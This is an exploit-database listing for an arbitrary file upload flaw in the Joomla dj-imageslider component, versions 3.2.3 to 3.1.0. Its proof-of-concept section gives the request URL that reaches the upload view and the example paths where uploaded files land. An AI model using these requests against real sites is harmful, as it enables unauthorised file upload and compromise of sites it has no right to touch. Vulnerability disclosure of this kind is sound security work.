Joomla! Component dj-imageslider 3.2.3-3.1.0 - Arbitrary File Upload Vulnerability

2018.06.06

41!kh4224rDz (DZ)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: [Joomla! Component dj-imageslider 3.2.3-3.1.0 - Arbitrary File Upload Vulnerability]
# Google Dork: [no]
# Date: [2018-06-05]
# Exploit Author: [41!kh4224rDz]
===========================================================================================================
# Vendor Homepage: [link]
#  Software Link: [https://dj-extensions.com/downloads/doc_download/82-dj-imageslider-aio-all-in-one-joomla-3x]  3.2.3
#  Software Link: [https://dj-extensions.com/downloads/doc_download/234-dj-imageslider-aio-all-in-one-joomla-25]  3.1.0   
======================================================================================================================
# Version: [3.2.3-3.1.0] 
# Tested on: [Win 7/Google chrome]

ذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذ
#  POC: 

# Exploit:

# http://localhost/[PATH]/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_image&e_name=&asset=com_djimageslider&author=&folder=

# For Exmple:  site.com/[PATH]/index.php?option=com_media&view=images&tmpl=component&fieldid=jform_image&e_name=&asset=com_djimageslider&author=&folder=

# http://localhost/[PATH]/images/name.jpg

# http://localhost/[PATH]/images//name.txt

ذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذذ

exploit-db ,exploitalert,cxsecurity ..................

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla! Component dj-imageslider 3.2.3-3.1.0 - Arbitrary File Upload Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.